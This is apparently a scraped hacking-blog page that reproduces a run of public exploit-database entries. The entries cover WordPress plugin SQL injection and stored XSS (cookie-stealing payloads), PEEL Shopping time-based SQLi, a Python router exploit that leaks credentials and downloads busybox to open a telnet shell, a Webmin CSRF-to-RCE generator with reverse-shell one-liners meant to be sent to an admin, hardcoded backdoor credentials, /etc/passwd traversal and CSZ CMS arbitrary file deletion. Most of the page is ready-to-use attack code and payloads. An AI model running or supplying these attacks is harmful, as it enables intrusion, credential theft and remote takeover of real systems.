# Exploit Title: WordPress Plugin LearnPress 3.2.6.7 - 'current_items' SQL Injection (Authenticated)
# Date: 07-17-2021
# Exploit Author: nhattruong or nhattruong.blog
# Vendor Homepage: https://thimpress.com/learnpress/
# Software Link: https://wordpress.org/plugins/learnpress/
# Version: < 3.2.6.8
# References link: https://wpscan.com/vulnerability/10208
# CVE: CVE-2020-6010
POC:
1. Go to url http://<host>/wp-admin
2. Login with a cred
3. Execute the payload
POST /wordpress/wp-admin/post-new.php?post_type=lp_order HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: application/json, text/plain, */*
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/wp-admin/post-new.php?post_type=lp_order
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 128
Origin: http://localhost
Connection: close
Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=test%7C1626703944%7Ch5yJTmZF2VUp6nuZHvt3WpWHJOGpYRUwaDfRNLd8N3x%7Cf0e96afd20e39e4531756b321160a4929f82f20a3fed8d3c3b682e0ece232e08; wordpress_test_cookie=WP+Cookie+check; wp_learn_press_session_bbfa5b726c6b7a9cf3cda9370be3ee91=80e1cb27266ae862f9e71f90a987f260%7C%7C1626703938%7C%7Cbd6b88d1ae5fd4354f09534ad4971bbc; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=test%7C1626703944%7Ch5yJTmZF2VUp6nuZHvt3WpWHJOGpYRUwaDfRNLd8N3x%7Ce1092ef2869397bd9701ca7f1c6d0399c89459f5221db89c48a53b39b3e8cc2f; wp-settings-time-3=1626531145
type=lp_course&context=order-items&context_id=32&term=+test&paged=1&lp-ajax=modal_search_items¤t_items[]=1 or sleep(1)-- -
# Modify current_items[] as you want
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863128349
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
import socket
import sys
import struct
import time
import threading
import urllib3
import re
import telnetlib
import xml.etree.ElementTree as ET
import requests
urllib3.disable_warnings()
CONTINUE_RACE = True
SNPRINTF_CREATEFILE_MAX_LENGTH = 245
def race_papi_message(ip):
global CONTINUE_RACE
payload = b"\x49\x72"
payload += b"\x00\x03"
payload += b"\x7F\x00\x00\x01"
payload += b"\x7F\x00\x00\x01"
payload += b"\x00\x00"
payload += b"\x00\x00"
payload += b"\x3B\x7E"
payload += b"\x41\x41"
payload += b"\x04\x22"
payload += b"\x00\x00"
payload += b"\x02\x00"
payload += b"\x00\x00"
payload += b"\x00" * 12 * 4
text_to_send = bytes()
for i in "msg_ref 3000 /tmp/cfg-plaintext\x00":
text_to_send += struct.pack("B", int(ord(i)) ^ 0x93)
packet = payload + text_to_send
while CONTINUE_RACE:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect((ip, 8211))
s.send(packet)
s.close()
time.sleep(0.004)
def find_credentials(text):
res = re.search("mgmt-user .*", text)[0]
res = res.split(" ")
return (res[1], res[2])
def login(ip, username, password):
login_data = {
"opcode": "login",
"user": username,
"passwd": password,
"refresh": "false",
}
res = requests.post("https://{}:4343/swarm.cgi".format(ip), data=login_data, verify=False)
root = ET.fromstring(res.text)
return root.find("./data[@name='sid']").text
def create_directory(ip, sid):
request_data = "opcode=config&ip=127.0.0.1&cmd='end%20%0Aapply%20cplogo-install%20\"https://{ip}:4343/%09--directory-prefix%09/tmp/oper_/%09#\"'&refresh=false&sid={sid}&nocache=0.23759201691110987&=".format(ip=ip, sid=sid)
res = requests.post("https://{}:4343/swarm.cgi".format(ip), data=request_data, verify=False)
if "/tmp/oper_" in res.text:
print("[+] Successfully created /tmp/oper_/ directory :)")
return True
else:
print("[-] Failed creating /tmp/oper_/ directory")
return False
def prepare_upload_id(command):
base_payload = "/../../etc/httpd/"
cmd_len = len(command)
padding_len = SNPRINTF_CREATEFILE_MAX_LENGTH - cmd_len - len(base_payload) - 8 # for the .gz at the end and the '; + spaces
if padding_len < 0:
print("[-] Command too long length:{}".format(padding_len))
exit(1)
return base_payload + ('/' * (padding_len - 1)) + 'A' + "'; {} #.gz".format(command)
def create_file(ip, command):
upload_id = prepare_upload_id(command)
requests.post("https://{}:4343/swarm.cgi".format(ip), data={"opcode": "cp-upload", "file_type": "logo", "upload_id": upload_id, "sid": "basdfbsfbsfb"}, files={"file": "test2"}, verify=False)
def run_command(ip, command):
print("[*] Executing telnet")
command = command.replace("?", "%3F")
command = command.replace("#", "\\\\x23")
s = requests.Session()
req = requests.Request('GET', "https://{}:4343/A';%20{}%20%23".format(ip, command))
prep = req.prepare()
response = s.send(prep, verify=False)
return response.text
def build_command(command):
command = command.replace("/", "\\\\x2F")
command = command.replace("#", "\\\\x23")
command = command.replace("\"", "\\\"")
command = command.replace("`", "\`")
final_command = "echo -e \"{}\"|sh".format(command)
return final_command
def telnet_connect(router_ip):
print("[*] Connecting to telnet")
with telnetlib.Telnet(router_ip, 22222) as tn:
tn.write(b"rm /etc/httpd/A*sh*.gz\n")
tn.interact()
def main():
global CONTINUE_RACE
ip = sys.argv[1]
print("[*] Starting the PAPI race thread")
papi_thread = threading.Thread(target=race_papi_message, args=(ip, ))
papi_thread.start()
while CONTINUE_RACE:
time.sleep(0.1)
res = requests.get("https://{}:4343/swarm.cgi?opcode=single_signon&key=AAAA&ip=%20127.0.0.1".format(ip), timeout=3, verify=False)
if "version" in res.text:
print("[+] Successfully leaked the password from config")
CONTINUE_RACE = False
file_content = re.findall("var SESSION_ID = '(.*?)';", res.text, re.S)[0]
user, password = find_credentials(file_content)
print("[+] Successfully extracted username: {} and password: {}".format(user, password))
sid = login(ip, user, password)
print("[*] SID generated: {}".format(sid))
command = """cd /tmp;/usr/sbin/wget https://busybox.net/downloads/binaries/1.21.1/busybox-armv5l --no-check-certificate -O telnetd;chmod +x telnetd;./telnetd -p 22222 -l sh"""
final_command = build_command(command)
if not create_directory(ip, sid):
return
print("[*] Creating malicious file in /etc/httpd/")
create_file(ip, final_command)
print(run_command(ip, final_command))
time.sleep(1) # Sleeping waiting for telnet.
telnet_connect(ip)
if __name__ == "__main__":
main()
# Exploit Title: WordPress Plugin LearnPress 3.2.6.8 - Privilege Escalation
# Date: 07-17-2021
# Exploit Author: nhattruong or nhattruong.blog
# Vendor Homepage: https://thimpress.com/learnpress/
# Software Link: https://wordpress.org/plugins/learnpress/
# Version: < 3.2.6.9
# References link: https://wpscan.com/vulnerability/22b2cbaa-9173-458a-bc12-85e7c96961cd
# CVE: CVE-2020-11511
POC:
1. Find out your user id
2. Login with your cred
3. Execute the payload
http://<host>/wp-admin/?action=accept-to-be-teacher&user_id=<your_id>
# Done!
# Exploit Title: WordPress Plugin KN Fix Your Title 1.0.1 - 'Separator' Stored Cross-Site Scripting (XSS)
# Date: 19/07/2021
# Exploit Author: Aakash Choudhary
# Software Link: https://wordpress.org/plugins/kn-fix-your/
# Version: 1.0.1
# Category: Web Application
# Tested on Mac
How to Reproduce this Vulnerability:
1. Install WordPress 5.7.2
2. Install and activate KN Fix Your Title
3. Navigate to Fix Title under Settings Tab >> Click on I have done this and enter the XSS payload into the Separator input field.
4. Click Save Changes.
5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality at that time JavaScript payload is executing successfully and we are getting a pop-up.
6. Payload Used: "><script>alert(document.cookie)</script>
# Exploit Title: PEEL Shopping 9.3.0 - 'id' Time-based SQL Injection
# Date: 2021-07-10
# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)
# Vendor Homepage: https://www.peel.fr
# Software Link: https://sourceforge.net/projects/peel-shopping/files/peel-shopping_9_3_0.zip/download
# Version: prior to 9.4.0
# Tested on: Windows 10, XAMPP
# Reference: https://github.com/advisto/peel-shopping/issues/3
# CVE: CVE-2021-37593
################
# Description #
################
# PEEL Shopping is an eCommerce shopping cart application in PHP / MySQL which works on any hosting. Public user/guest (unauthenticated) can inject malicious SQL query in order to affect the execution of predefined SQL commands via the "id" parameter on the "/peel-shopping_9_4_0/achat/produit_details.php?id=[SQLi]" endpoint. Upon successful of SQL injection attack, attacker can read sensitive data from the database or modify database data.
#####################
# PoC of detection #
#####################
1) Assumed peel-shopping_9_4_0 out of box installation database name is peel. This query will check if database() name like hex(%peel%) - it will delay for 7 seconds before redirect to homepage (http://localhost/peel-shopping_9_4_0/) that indicates TRUE SQL statement which mean the database name like "peel".
PoC #1) param id - time-based SQLi
Payload: (SELECT+1337+FROM+(SELECT(SLEEP(7-(IF(DATABASE()+LIKE+0x257065656c25,0,5)))))FSXX)
Request: The response duration = 418 bytes | 7,719 millis
========
GET /peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELECT(SLEEP(7-(IF(DATABASE()+LIKE+0x257065656c25,0,5)))))FSXX) HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/peel-shopping_9_4_0/
DNT: 1
Connection: close
Cookie: OCSESSID=3b7c67760a18581016f7c4f5fb; language=en-gb; currency=USD; sid7cc7e9c2=07dnj7pgglunl1ei5r3ikeno5inu1gsc; last_views=a%3A1%3A%7Bi%3A0%3Bi%3A15%3B%7D; __atuvc=1%7C28; __atuvs=60eaece0c300734f000
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
Cache-Control: max-age=0
---
2) Assumed the web is using MariaDB database server - check if db_version like hex(%MariaDB%), it will delay for 5 seconds if TRUE.
PoC #2) param id - time-based SQLi
Payload: (SELECT+1337+FROM+(SELECT(SLEEP(5-(IF(VERSION()+LIKE+0x254d61726961444225,0,5)))))FSXX)
Request: The response duration = 418 bytes | 5,112 millis
========
GET /peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELECT(SLEEP(5-(IF(VERSION()+LIKE+0x254d61726961444225,0,5)))))FSXX) HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/peel-shopping_9_4_0/
DNT: 1
Connection: close
Cookie: OCSESSID=3b7c67760a18581016f7c4f5fb; language=en-gb; currency=USD; sid7cc7e9c2=07dnj7pgglunl1ei5r3ikeno5inu1gsc; last_views=a%3A1%3A%7Bi%3A0%3Bi%3A15%3B%7D; __atuvc=1%7C28; __atuvs=60eaece0c300734f000
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
Cache-Control: max-age=0
---
3) By default, the database have a table name = peel_produits. This query will check if table_name peel_produits is exist, it will delay for 10 seconds if TRUE, else will redirect to homepage instantly.
PoC #3) param id - time-based SQLi
Payload: (SELECT+1337+FROM+(SELECT(SLEEP(10-(IF(EXISTS(SELECT+3+FROM+peel.peel_produits),0,5)))))FSXX)
Request: The response duration = 418 bytes | 10,140 millis
========
GET /peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELECT(SLEEP(10-(IF(EXISTS(SELECT+3+FROM+peel.peel_produits),0,5)))))FSXX) HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/peel-shopping_9_4_0/
DNT: 1
Connection: close
Cookie: OCSESSID=3b7c67760a18581016f7c4f5fb; language=en-gb; currency=USD; sid7cc7e9c2=07dnj7pgglunl1ei5r3ikeno5inu1gsc; last_views=a%3A1%3A%7Bi%3A0%3Bi%3A15%3B%7D; __atuvc=1%7C28; __atuvs=60eaece0c300734f000
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
Cache-Control: max-age=0
---
# For more explaination, you can refer to the github issue on peel-shopping via https://github.com/advisto/peel-shopping/issues/3.
# The affected version is prior to 9.4.0. Now it is fixed on version 9.4.0.1
# The vendor has released the latest patched version on 9.4.0.1 that is available for download from sourceforge.net[https://sourceforge.net/projects/peel-shopping/files/peel-shopping_9_4_0_1.zip/download]
# Exploit Title: WordPress Plugin Mimetic Books 0.2.13 - 'Default Publisher ID field' Stored Cross-Site Scripting (XSS)
# Date: 18/07/2021
# Exploit Author: Vikas Srivastava
# Vendor Homepage:
# Software Link: https://wordpress.org/plugins/mimetic-books/
# Version: 0.2.13
# Category: Web Application
# Tested on Mac
How to Reproduce this Vulnerability:
1. Install WordPress 5.7.2
2. Install and activate Mimetic Books
3. Navigate to Settings >> Mimetic Books API and enter the XSS payload into the Default Publisher ID input field.
4. Click Save Changes.
5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality at that time JavaScript payload is executing successfully and we are getting a pop-up.
6. Payload Used: "><script>alert(document.cookie)</script>
# Exploit Title: Webmin 1.973 - 'run.cgi' Cross-Site Request Forgery (CSRF)
# Date: 24/04/2021
# Exploit Author: Mesh3l_911 & Z0ldyck
# Vendor Homepage: https://www.webmin.com
# Repo Link: https://github.com/Mesh3l911/CVE-2021-31761
# Version: Webmin 1.973
# Tested on: All versions <= 1.973
# CVE: CVE-2021-31761
# Description: Exploiting a Reflected Cross-Site Scripting (XSS) attack to
# get a Remote Command Execution (RCE) through the Webmin's running process
# feature
import time, subprocess,random,urllib.parse
print('''\033[1;37m
__ __ _ ____ _ _________ _ _ _
| \/ | | | |___ \| | |___ / _ \| | | | | |
| \ / | ___ ___| |__ __) | | / / | | | | __| |_ _ ___| | __
| |\/| |/ _ \/ __| '_ \ |__ <| | / /| | | | |/ _` | | | |/ __| |/ /
| | | | __/\__ \ | | |___) | | _ _ / /_| |_| | | (_| | |_| | (__| <
|_| |_|\___||___/_| |_|____/|_| (_|_) /_____\___/|_|\__,_|\__, |\___|_|\_/
__/ |
|___/
\033[1;m''')
for i in range(101):
print(
"\r\033[1;36m [>] POC By \033[1;m \033[1;37mMesh3l\033[1;m \033[1;36m ( \033[1;m\033[1;37m@Mesh3l_911\033[1;m\033[1;36m ) & \033[1;m \033[1;37mZ0ldyck\033[1;m\033[1;36m ( \033[1;m\033[1;37m@electronicbots\033[1;m\033[1;36m ) \033[1;m {} \033[1;m".format(
i), "\033[1;36m%\033[1;m", end="")
time.sleep(0.02)
print("\n\n")
target = input(
"\033[1;36m \n Please input ur target's webmin path e.g. ( https://webmin.Mesh3l-Mohammed.com/ ) > \033[1;m")
if target.endswith('/'):
target = target + 'tunnel/link.cgi/'
else:
target = target + '/tunnel/link.cgi/'
ip = input("\033[1;36m \n Please input ur IP to set up the Reverse Shell e.g. ( 10.10.10.10 ) > \033[1;m")
port = input("\033[1;36m \n Please input a Port to set up the Reverse Shell e.g. ( 1337 ) > \033[1;m")
ReverseShell = input \
('''\033[1;37m
\n
1- Bash Reverse Shell \n
2- PHP Reverse Shell \n
3- Python Reverse Shell \n
4- Perl Reverse Shell \n
5- Ruby Reverse Shell \n
\033[1;m
\033[1;36mPlease insert the number Reverse Shell's type u want e.g. ( 1 ) > \033[1;m''')
file_name = random.randrange(1000)
if ReverseShell == '1':
ReverseShell = 'mkfifo /tmp/'+str(file_name)+'; nc '+ip+' '+port+' 0</tmp/'+str(file_name)+' | /bin/sh >/tmp/'+str(file_name)+' 2>&1; rm /tmp/'+str(file_name)+''
elif ReverseShell == '2':
ReverseShell = ''' php -r '$sock=fsockopen("''' + ip + '''",''' + port + ''');exec("/bin/sh -i <&3 >&3 2>&3");' '''
elif ReverseShell == '3':
ReverseShell = ''' python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("''' + ip + '''",''' + port + '''));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' '''
elif ReverseShell == '4':
ReverseShell = ''' perl -e 'use Socket;$i="''' + ip + '''";$p=''' + port + ''';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' '''
elif ReverseShell == '5':
ReverseShell = ''' ruby -rsocket -e'f=TCPSocket.open("''' + ip + '''",''' + port + ''').to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' '''
else:
print("\033[1;36m \n Please Re-Check ur input :( \033[1;m \n")
def CSRF_Generator():
Payload = urllib.parse.quote('''
<html>
<head>
<meta name="referrer" content="never">
</head>
<body>
<script>history.pushState('', '', '/')</script>
<form action="/proc/run.cgi" method="POST">
<input type="hidden" name="cmd" value="''' + ReverseShell + '''" />
<input type="hidden" name="mode" value="0" />
<input type="hidden" name="user" value="root" />
<input type="hidden" name="input" value="" />
<input type="hidden" name="undefined" value="" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
''')
print("\033[1;36m\nHere's ur link , send it to a Webmin's Admin and wait for ur Reverse Shell ^_^ \n \n\033[1;m")
print(target+Payload)
def Netcat_listener():
print()
subprocess.run(["nc", "-nlvp "+port+""])
def main():
CSRF_Generator()
Netcat_listener()
if __name__ == '__main__':
main()
# Exploit Title: KevinLAB BEMS 1.0 - Undocumented Backdoor Account
# Date: 05.07.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.kevinlab.com
Vendor: KevinLAB Inc.
Product web page: http://www.kevinlab.com
Affected version: 4ST L-BEMS 1.0.0 (Building Energy Management System)
Summary: KevinLab is a venture company specialized in IoT, Big Data, A.I based energy
management platform. KevinLAB's BEMS (Building Energy Management System) enables
efficient energy management in buildings. It improves the efficient of energy use
by collecting and analyzing various information of energy usage and facilities in
the building. It also manages energy usage, facility efficiency and indoor environment
control.
Desc: The BEMS solution has an undocumented backdoor account and these sets of
credentials are never exposed to the end-user and cannot be changed through any
normal operation of the solution thru the RMI. Attacker could exploit this
vulnerability by logging in using the backdoor account with highest privileges
for administration and gain full system control. The backdoor user cannot be
seen in the users settings in the admin panel and it also uses an undocumented
privilege level (admin_pk=1) which allows full availability of the features that
the BEMS is offering remotely.
Tested on: Linux CentOS 7
Apache 2.4.6
Python 2.7.5
PHP 5.4.16
MariaDB 5.5.68
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5654
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5654.php
05.07.2021
--
Backdoor accounts from the DB:
------------------------------
Username: kevinlab (permission=1)
Password: kevin003
Username: developer1 (permission=6)
Password: 1234
# Exploit Title: KevinLAB BEMS 1.0 - File Path Traversal Information Disclosure (Authenticated)
# Date: 05.07.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.kevinlab.com
Vendor: KevinLAB Inc.
Product web page: http://www.kevinlab.com
Affected version: 4ST L-BEMS 1.0.0 (Building Energy Management System)
Summary: KevinLab is a venture company specialized in IoT, Big Data, A.I based energy
management platform. KevinLAB's BEMS (Building Energy Management System) enables
efficient energy management in buildings. It improves the efficient of energy use
by collecting and analyzing various information of energy usage and facilities in
the building. It also manages energy usage, facility efficiency and indoor environment
control.
Desc: The BEMS suffers from an authenticated arbitrary file disclosure vulnerability.
Input passed through the 'page' GET parameter in index.php is not properly verified
before being used to include files. This can be exploited to disclose the contents
of arbitrary and sensitive files via directory traversal attacks.
Tested on: Linux CentOS 7
Apache 2.4.6
Python 2.7.5
PHP 5.4.16
MariaDB 5.5.68
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5656
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5656.php
05.07.2021
--
GET https://192.168.1.3/pages/index.php?page=../../../../etc/passwd HTTP/1.1
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
...
...
# Exploit Title: CSZ CMS 1.2.9 - 'Multiple' Arbitrary File Deletion
# Date: 2021-07-20
# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)
# Vendor Homepage: https://www.cszcms.com
# Software Link: https://sourceforge.net/projects/cszcms/files/latest/download
# Version: 1.2.9
# Tested on: Windows 10, XAMPP
# Reference: https://github.com/cskaza/cszcms/issues/32
################
# Description #
################
# CSZ CMS is an open source Content Management System web application that allows to manage all content and settings on the websites. CSZ CMS was built on the basis of Codeigniter3 and design the structure of Bootstrap3. When unsanitized user input is supplied to a file deletion function, an arbitrary file deletion vulnerability arises. This occurs in PHP when the unlink() function is called and user input might affect portions of or the whole affected parameter, which represents the path of the file to remove, without sufficient sanitization. Exploiting the vulnerability allows an attacker to delete any file in the web root (along with any other file on the server that the PHP process user has the proper permissions to delete). Furthermore, an attacker might leverage the capability of arbitrary file deletion to circumvent certain webserver security mechanisms such as deleting .htaccess file that would deactivate those security constraints.
##########
# PoC 1 #
##########
Vulnerable URL: http://localhost/CSZCMS-V1.2.9/admin/plugin/article/editArtSave
Vulnerable Code: line 116, 131 - cszcms\models\plugin\Article_model.php
Steps to Reproduce:
1. Login as admin
2. Goto Plugin Manager > Article > edit any article
3. Upload any image as "Main Picture" and "File Upload" and click save button
4. Click "Delete File" button for both "Main Picture" and "File Upload" and click save button
5. Intercept the request and replace existing image to any files on the server via parameter "del_file" and "del_file2"
1) Assumed there are files conf_secret_file.php and config_backup.txt in web root
PoC #1) param del_file & del_file2 - Deleting conf_secret_file.php and config_backup.txt files in web root
Request:
========
POST /CSZCMS-V1.2.9/admin/plugin/article/editArtSave/4 HTTP/1.1
Host: localhost
Content-Length: 2048
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="91", " Not;A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAMyATk1BfQaBOHvY
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/CSZCMS-V1.2.9/admin/plugin/article/artedit/4
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: last_views=a%3A3%3A%7Bi%3A0%3Bi%3A17%3Bi%3A1%3Bi%3A19%3Bi%3A2%3Bi%3A18%3B%7D; __atuvc=5%7C27; c4204054ab0d5b68399458e70744010b_cszsess=l9f1kpqohequemh1q3tt11j36hs99c25
Connection: close
------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="title"
article beta
------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="keyword"
testing file
------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="short_desc"
deletion
------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="cat_id"
2
------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="content"
<div class="row">
<div class="col-md-12">
<p>test for file deletion</p>
</div>
</div>
<p><br><br></p>
------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="del_file"
../../../conf_secret_file.php
------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="file_upload"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="mainPicture"
2021/1626802955_1.png
------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="del_file2"
../../../config_backup.txt
------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="file_upload2"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="mainFile"
2021/1626802956_1.png
------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="lang_iso"
en
------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="active"
1
------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="fb_comment_active"
1
------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="fb_comment_limit"
5
------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="fb_comment_sort"
reverse_time
------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="submit"
Save
------WebKitFormBoundaryAMyATk1BfQaBOHvY--
---
##########
# PoC 2 #
##########
Vulnerable URL: http://localhost/CSZCMS-V1.2.9/admin/settings/update
Vulnerable Code: line 944, 958 - cszcms\models\Csz_admin_model.php
Steps to Reproduce:
1. Login as admin
2. Goto General Menu > Site Setting
3. Upload any image as "Site Logo" and "Image of og metatag" and click save button
4. Click "Delete File" button for both "Site Logo" and "Image of og metatag" and click save button
5. Intercept the request and replace existing image to any files on the server via parameter "del_file" and "del_og_image"
2) Assumed there are files conf_secret_file.php and config_backup.txt in web root
PoC #2) param del_file & del_og_image - Deleting conf_secret_file.php and config_backup.txt in web root
Request:
========
POST /CSZCMS-V1.2.9/admin/settings/update HTTP/1.1
Host: localhost
Content-Length: 5163
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="91", " Not;A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8cAl5KcKGP0D3Qi2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/CSZCMS-V1.2.9/admin/settings
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: last_views=a%3A3%3A%7Bi%3A0%3Bi%3A17%3Bi%3A1%3Bi%3A19%3Bi%3A2%3Bi%3A18%3B%7D; __atuvc=5%7C27; c4204054ab0d5b68399458e70744010b_cszsess=t5jloe106o2i5hst51chr5ita9aklieu
Connection: close
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="siteTitle"
CSZ CMS Starter
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="title_setting"
2
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="siteFooter"
© %Y% CSZ CMS Starter
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="siteKeyword"
CMS, Contact Management System, HTML, CSS, JS, JavaScript, framework, bootstrap, web development, thai, english
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="siteTheme"
cszdefault
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="siteLang"
english
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="additional_metatag"
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="additional_js"
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="pagecache_time"
0
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="assets_static_domain"
demo@cszcms.com
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="html_optimize_disable"
1
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="del_file"
../../conf_secret_file.php
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="file_upload"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="siteLogo"
2021/1626800829_logo.png
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="del_og_image"
../../config_backup.txt
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="og_image"; filename=""
Content-Type: application/octet-stream
